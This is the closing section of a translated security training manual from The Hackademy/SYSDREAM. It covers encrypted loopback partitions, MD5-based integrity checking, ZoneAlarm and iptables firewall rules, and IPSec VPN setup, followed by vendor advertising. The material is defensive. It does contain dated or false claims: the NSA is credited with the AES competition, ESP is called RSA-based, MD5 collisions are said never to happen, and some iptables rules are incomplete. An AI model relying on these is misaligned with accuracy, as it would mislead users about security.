You have the choice between several numbering algorithms. AES was the winner of the best algorithm competition organized by NSA, the serpent coming in second. You will also need the losetup package. Recompile your kernel, then, in root, we are going to set up a hda5 partition on the loopback / dev/loop0 device. Anything transiting on this virtual device will be encrypted/decrypted with the password asked for: Laptop:/home/xdream# losetup -e serpent -k 256 /dev/loop0 /dev/hda5 Password: xxxx

The Hackademy

DMP

-194/209-

SYSDREAM

The first time this operation is done, we will have to format the partition in ext2 (it is not advised to use a journalized file system on an encrypted partition). The formatting of /dev/hda5 will also be encrypted, so we are going to format /dev/loop0 Laptop:/home/xdream# mke2fs /dev/loop0 mke2fs 1.27 (8-Mar-2002) Filesystem label= OS type: Linux Block size=4096 (log=2) Fragment size=4096 (log=2) 611648 inodes, 1220932 blocks 61046 blocks (5.00%) reserved for the super user First data block=0 38 block groups 32768 blocks per group, 32768 fragments per group 16096 inodes per group Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912, 819200, 884736 Writing inode tables: done Writing superblocks and filesystem accounting information: done This filesystem will be automatically checked every 20 mounts or 180 days, whichever comes first. Use tune2fs -c or -i to override.

We can finally set up the virtual device on the specified setup point: Laptop:/home/xdream# mount /dev/loop0 /mnt/CYPHER Laptop:/home/xdream# ls /mnt/CYPHER lost+found

To remove the encrypted disk: Laptop:/home/xdream# umount /mnt/CYPHER Laptop:/home/xdream# losetup -d /dev/loop0

Once the encrypted disk will have been formatted a first time, you can automate this operation with a script shell, to which you will send the mount option to set up the partition and unmount to remove it. #!/bin/sh case $1 in mount) losetup -e serpent -k 256 /dev/loop0 /dev/hda5 mount /dev/loop0 /mnt/CYPHER break;; umount) umount /mnt/CYPHER losetup -d /dev/loop0 break;; *) echo « Usage: $0 [mount | umount] The Hackademy

DMP

-195/209-

SYSDREAM

break;; esac exit 1

5. System Integrity To control the integrity of a file is to check that not one single byte has been modified. Mathematical algorithms (MD5, SHA1, ...) can create digital signatures for a given bytes suite. When a file is recognized as “clean”, we are going to associate to it an signature of an MD5 (16 bytes) or a SHA1 (20 bytes) type. For an entire system, we are going to establish a list of signatures associated to a list of files. On Windows, FileCheckMD5 is a free tool that establishes a signature base. This base must be saved on an outer medium (for example a CD-ROM) so as not to risk it being compromised. Note that it is in theory possible for two different files (bytes suite) to give the same signature, creating a “collision”. In practise, this never happens: there are 340,282,366,920,938,463,463,374,607,431,768,211,456 possible signatures for MD5. Integrity controller on Windows File CheckMD5 is an integrity controller on Windows. It will come from a root directory and create signatures for all files and sub-files of the selected directory. The database, in text format, is saved at the root of the disk (C:). It contains lines similar to this one: d26c63ef6c04bac8c1a74bbdb4f26cef|WINNT\system32\dsquery.dll On the left is the MD5 signature in hexadecimal form, the | is a limit for the file name on the right. This tool can be downloaded from http://www.brandonstaggs.com/filecheckmd5.html.

The Hackademy

DMP

-196/209-

SYSDREAM

Integrity controller on Linux There is a well-known integrity controller under GPL license on Linux, called TripWire (http://www.tripwire.org). TripWire not only creates signatures for files, it also monitors certain attributes of these files. It can however be quite hard to use because of the simple necessity of having to control the files' integrity, and we could prefer an alternative such as Integrit (http://integrit.sourceforge.net). Integrit is simple to use: we create a configuration file into which we put the original signature base, the name of the base to rewrite in case of updating and the root directory to check in a recursive way. So we write the integrit.cfg in an analogical way to this one: known=/etc/integrit.db current=/etc/integrit_update.db root=/sbin These files need to be created, of course. Then we launch Integrit a first time by typing in: $ integrit -C /etc/integrit.cfg -u And we check the files by typing in: $ integrit -C /etc/integrit.cfg -c

The Hackademy

DMP

-197/209-

SYSDREAM

6. Firewall A) Personal firewall Windows XP now integrates a firewall in its standard installation, however it is still strongly recommended to use tried and tested tools. Normally, you don't need a firewall: if you have no active server application on a system, it should be impossible to hack your system from outside. However, that is never the case by default on Windows (services such as netbios, UpnP, ...) What's more, a firewall does not only control entering data, but also outgoing data, which is important when the machine is used as a working station. ZoneAlarm is a firewall popular with the general public, that can control in a simple way entering and outgoing traffic through authorized applications. ZoneAlarm is free and available at http://www.zonelabs.com. The professional version is more complete than the free standard one. Our examples will be with this, the more complex version, which will offer a broader view of of firewall configuration principles on Windows. Its installation presents no difficulty, the steps are clear. Once ZoneAlarm is installed, only two sections of the software present a real interest for anything concerning network filtering rules: – –

firewall; program control.

"Firewall" Section In the main tab, it is possible to specify predefined tolerance levels concerning three types of “zones”. These zones concern the networks to which the computer is linked. Generally, we will find the “Internet” zone, the “Trusted” zone and the “Blocked” zone. The “Internet” zone is an explicit one, it contains all the Internet remote machines. The “Trusted” zone generally concerns the machines of a local network. Consider as “trusted” machines physically close to yours. Finally, the “Blocked” zone is defined by the administrator, and concerns the machines banned from any form of communication with yours.

The Hackademy

DMP

-198/209-

SYSDREAM

There are three protection levels: "High", "Medium" and "Low" : – – –

‘’High’’ : your machine does not answer any unauthorized request; ‘’Medium’’ : your machine answers to some requests (such as a ping) ; ‘’Low’’ : security is deactivated.

The Hackademy

DMP

-199/209-

SYSDREAM

In the “Custom” part, you can specify with more precision the security rules by default for the different zones: The “Zones” tab allows you to add or delete zones. A zone can be a single IP address or a whole array of machines. Zones can be qualified as "Trusted", "Blocked" or "Internet":

If the machine hosting the firewall is a gateway, using the “Expert” tab becomes a necessity to establish really viable security rules. In this part, it is possible to manually edit which protocols (ports) are authorized in emission or in reception according to the senders/destinations.

The Hackademy

DMP

-200/209-

SYSDREAM

"Program control" Section The “program control” section can regulate the list of software components authorized to treat requests on the network. In the main tab, four security levels are defined to control programs. These levels only specify the degree of attention that ZoneAlarm pays to the processes that try to work on the network or to establish themselves as a server. The best thing to do is to go through the “Advanced” section, as it allows a more precise regulation of the firewall activity.

The “Programs” and “Components” tabs contain the list of (DLL) programs and components authorized to communicate in the different zones (“trusted” and “Internet”):

The Hackademy

DMP

-201/209-

SYSDREAM

On the information take, we can notice three rules for the system softwares: – – –

authorized; unauthorized; unknown (a request will be made when the software will try to access to the network resources for the first time).

A server application could thus be authorized to receive connections from the LAN (“Trusted” zone) but not from the Internet). B) Netfilter We are going to see the basic notions for the use of iptables: Forbidding/Authorizing access to the server, nat and port forwarding. This tool is used in command line, the interesting thing being to be able to create firewalling scripts in line with your expectations, and with access authorizations you wish to establish on your servers. Iptables are accepted only from kernels 2.4. So you have to activate the appropriate modules to its medium during the compilation of the kernel: In the networking options section: Network packet filtering In the Netfilter subsection configuration: connection tracking ftp protocol support irc protocol support IP tables support Packet filtering Full NAT MASQUERADE target support REDIRECT target support You must also install the netfilter package. Furthermore, if you wish to activate forwarding, you can activate it with the command: root#echo 1 > /proc/sys/net/ipv4/ip_forward Here are the basic iptables options: -A Add a rule -D Delete a rule -R Replace a chain -L Display the rules -F Delete all rules -N Add a chain -X Delete a chain.

The Hackademy

DMP

-202/209-

SYSDREAM

The rules take the following values: INPUT Entering traffic OUTPUT Outgoing traffic FORWARD Will be used to carry out port forwarding The chains take the following values: MASQUERADE ACCEPT REJECT DROP

Will be used to carry out ip masquerading Accept the communication Forbid the communication and send a reject packet Forbid the communication, but do not send any packet

You can now create your own iptables configuration script. Here are a few examples. Beware, these are only simplistic examples, and in no way efficient filtering rules. We will see more efficient configurations in the following course. First of all, for the policy by default to be to forbid everything: iptables -P INPUT DROP iptables -P OUTPUT DROP iptables -P FORWARD DROP

To authorize communications on the local network and on the interface lo: iptables -A INPUT -i lo -j ACCEPT iptables -A OUTPUT -o lo -j ACCEPT iptables -A INPUT -s 192.168.1.0/24 -j ACCEPT iptables -A OUTPUT -d 192.168.1.0/24 -j ACCEPT iptables -A FORWARD -s 192.168.1.0/24 -j ACCEPT

To authorize outgoing dns requests: iptables -A INPUT -i ppp0 --protocol udp --source-port 53 -j ACCEPT iptables -A OUTPUT -o ppp0 --protocol udp --destination-port 53 -j ACCEPT iptables -A INPUT -i ppp0 --protocol tcp --source-port 53 -j ACCEPT iptables -A OUTPUT -o ppp0 --protocol tcp --destination-port 53 -j ACCEPT

To authorize the outgoing web navigation: iptables -A INPUT -i ppp0 --protocol tcp --source-port 80 -m state --state ESTABLISHED iptables -A OUTPUT -o ppp0 --protocol tcp --destination-port 80 -m state --state NEW,ESTABLISHED

The Hackademy

DMP

-203/209-

SYSDREAM

To share the Internet connection with other computers of your network: iptables -F FORWARD iptables -A FORWARD -j ACCEPT iptables -A POSTROUTING -t nat -o ppp0 -j MASQUERADE

Finally, to redirect all entering connections to port destination 80, up to machine 192.168.1.10 on its port 8080 (port forwarding): iptables -t nat -A PREROUTING -d votre_addresse_ip_internet -p tcp --dport 80 -j DNAT -to-destination 192.168.1.10:8080

Here is a summary of the script you could use if applying all of these rules: #/bin/sh #let's find which is our Internet address: IP=`ifconfig ppp0 | grep inet | awk {'print $2'} | awk -F ":" {'print $2}` iptables -P INPUT DROP iptables -P OUTPUT DROP iptables -P FORWARD DROP iptables -A INPUT -i lo -j ACCEPT iptables -A OUTPUT -o lo -j ACCEPT iptables -A INPUT -s 192.168.1.0/24 -j ACCEPT iptables -A OUTPUT -d 192.168.1.0/24 -j ACCEPT iptables -A FORWARD -s 192.168.1.0/24 -j ACCEPT

iptables -A INPUT -i ppp0 --protocol udp --source-port 53 -j ACCEPT iptables -A OUTPUT -o ppp0 --protocol udp --destination-port 53 -j ACCEPT iptables -A INPUT -i ppp0 --protocol tcp --source-port 53 -j ACCEPT iptables -A OUTPUT -o ppp0 --protocol tcp --destination-port 53 -j ACCEPT iptables -A INPUT -i ppp0 --protocol tcp --source-port 80 -m state --state ESTABLISHED iptables -A OUTPUT NEW,ESTABLISHED

-o

ppp0

--protocol

tcp

--destination-port

80

-m

state

--state

iptables -t nat -A PREROUTING -d $IP -p tcp --dport 80 -j DNAT --to-destination 192.168.1.10:8080

The Hackademy

DMP

-204/209-

SYSDREAM

7. VPN What is a Virtual Private Network? Company networks are for the most part physical: all computer resources are physically articulated around a local network in a same place. Using such a network means having to be physically close to the access points that we wish to reach. This is a major restriction when information must transit over long distances. A network extension is often done by using Internet resources. It is however not technologically possible to trust machines relaying information on the Internet. To make sure that the network remains private, even if it follows public paths, there are software solutions using secure protocols, essentially. As the communicating entities are not assembled in a same location, the network is said to be “virtual”. So a VPN is more than a well-defined technical solution. What services for a VPN? Using secure services such as SSH, is within the elaboration of a VPN. Generally speaking, though, it is actually necessary to secure not just one service, but all services, whatever they may be. So we directly secure packets of common communication protocols (IP and protocols of associated data transport). The security of a VPN means controlling the following points: – – –

confidentiality of data (cryptography) integrity of data (checksums) authentication of entities (cryptographic signatures)

IPSec IPSec can secure Ipv4 and Ipv6 packets. IPSec is based on security rules called SA, as in Security Associations. These rules are grouped in an SPD (Security Policy Database). IPSec is flexible and modular. It is implemented in different ways according to the needs of the association rules. It guarantees the integrity of a packet (AH method based on MD5 or SHA-1) and its confidentiality through encrypting (ESP method based on RSA), or both. The negotiation protocol of keys for the cryptographic aspect of IPSec is called IKE. As the entries in SPD are static, IPSec is an efficient protocol for communications between machines with fixed IPs (to link two local networks of companies via Internet through two gateways, for example). There are two communication modes for IPSec: transport and tunnel. In transport zone, only transported data is secured (IPSec headers are placed just after the IP header). In tunnel mode, IPSec generally takes charge of the IP header as data to cover (IPSec is placed before the IP header, and adds another one behind it).

The Hackademy

DMP

-205/209-

SYSDREAM

Way of encapsulating in transport mode with ESP:

Way of encapsulating in tunnel mode with ESP:

You can establish an IPSec network on Linux by compiling the core in an adapted way (KLIPS module instead of the native IPSec code) and by using the free solution FreeS/WAN (http://www.freeswan.org). The combined use of AH and ESP is not included in the development of FreeS/WAN: AH is no longer supported by FreeS/WAN. AH is not widely used, and IPSec's complexity due to the combined use of the two methods is not a desirable improvement (see Schneier and Ferguson's evaluation paper at: http://www.macfergus.com/pub/IPsec.html). If you haven't created a pair of keys with RSA, type in: $ ipsec newhostkey --output /etc/ipsec.secrets --hostname www.mymachine.com Once the installation done, the ipsec tool is available and will enable you to check, with the ipsec verify command, that the service is properly available. Net-to-Net Configuration: Between two machines (left/right) on IPSec, type on the first one: $ ipsec showhostkey –left On the second one, type: $ ipsec showhostkey --right On the first machine, edit the /etc/ipsec.conf configuration file on both machines and modify the information following the example below. Left and right are the machine on which FreeS/WAN is installed: conn net-to-net left=192.0.2.2 leftsubnet=192.0.2.128/29 [email protected] leftrsasigkey=0s1LgR7/oUM... # completer leftnexthop=%defaultroute right=192.0.2.9 rightsubnet=10.0.0.0/24 [email protected] rightrsasigkey=0sAQOqH55O... # completer rightnexthop=%defaultroute auto=add

The Hackademy

DMP

-206/209-

SYSDREAM

Contact

1 Villa du clos de Malevart 75011 Paris. Tel: 01 40 21 04 28 e-mail: [email protected]

26 bis rue jeanne d'Arc 94160 St Mandé Tel: 01 53 66 95 28 e-mail: [email protected]

The Hackademy

DMP

-207/209-

SYSDREAM

the HACKADEMY ,c'est aussi: The Hackademy Journal, The Hackademy manal et and other special issues!!!!!

So don't hesitate to subscribe, by filling in the following form:

The Hackademy

DMP

-208/209-

SYSDREAM

Created by trainers from The Hackademy, SYSDREAM is a software house that specializes in IT security.

We offer companies our expertise to ensure their IT infrastructure's reliability and security.

We specialize in: •

Security Audits: a global appraisal of your system (intrusive test, technical audit, vulnerability audit).

•

Systech security products: material solutions destined to reinforce your infrastructure's security, while insuring an efficient follow-up for any type of network or system event.

•

Application development: we can intervene or advise you in all development phases of your application.

www.sysdream.com

For further information: [email protected]

The Hackademy

DMP

-209/209-

SYSDREAM